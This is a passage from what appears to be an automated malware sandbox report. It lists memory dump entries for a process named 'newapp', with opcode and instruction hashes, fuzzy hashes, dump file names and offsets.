                                                          • Opcode Fuzzy Hash: d6a3f0edc62e6099d24020e35f6cabf50c3120ae28cadd585aae36993427a3aa
                                                          • Instruction Fuzzy Hash: CD228070E10214CFCB54BFB9E95925CBBF1EB48304F4185AAD489E3350DE395D4ACB66
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c1a7669a6b49ed1fef62e26815eb13e83374b6a2cb3f469f145c53bccf21a9a
                                                          • Instruction ID: 48fa34497f1724c76581c6d457f49822d469a721c8505bca5e42bf7917408d52
                                                          • Opcode Fuzzy Hash: 0c1a7669a6b49ed1fef62e26815eb13e83374b6a2cb3f469f145c53bccf21a9a
                                                          • Instruction Fuzzy Hash: E5E1D070A182108FC309BB79D95921D7BF6EF85614F45C8ADE489DB391DA3CAC0AC793
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78ee0c1f8d0b9727d881f8fecfca8f3cfb70136ce10d6e292004db85db813c12
                                                          • Instruction ID: e66cd779c48c19e6db14ba389a46d9a1fdcae8e5be7a5bfc1025fc3d58e12074
                                                          • Opcode Fuzzy Hash: 78ee0c1f8d0b9727d881f8fecfca8f3cfb70136ce10d6e292004db85db813c12
                                                          • Instruction Fuzzy Hash: EAE1E471A10211CBC744FFB9E58A62D7BB6EF84604F858879D489E7380DE3CAC55C792
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2573033706.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_152d000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15bb06207d7239ca86beaddb604177d71094ab7b6d3d57971d355d3555d4d02d
                                                          • Instruction ID: 0f7311cb3988605bfe537d55f83adfc7ed0dd76035caabc7932263c88c081f8c
                                                          • Opcode Fuzzy Hash: 15bb06207d7239ca86beaddb604177d71094ab7b6d3d57971d355d3555d4d02d
                                                          • Instruction Fuzzy Hash: 19212872604244DFDB05DF58D9C0B2ABFB5FB89318F20C569E9090F296C376D455CAA1
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.2607359314.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_7890000_newapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a0147921b91533f939dd63dff12c4196340516c028ae4984a5f81098bafddd8d
                                                          • Instruction ID: db0abd6d3e3ffccbaa578a032ea2e5787997739702e8c8b2c47fbeae35626b3b
                                                          • Opcode Fuzzy Hash: a0147921b91533f939dd63dff12c4196340516c028ae4984a5f81098bafddd8d
                                                          • Instruction Fuzzy Hash: ED219DA264E3D28FD7038B749C656A9BF31AF83110B0E41EBD495DB1E3D52D5C0AD362
                                                          Memory Dump Source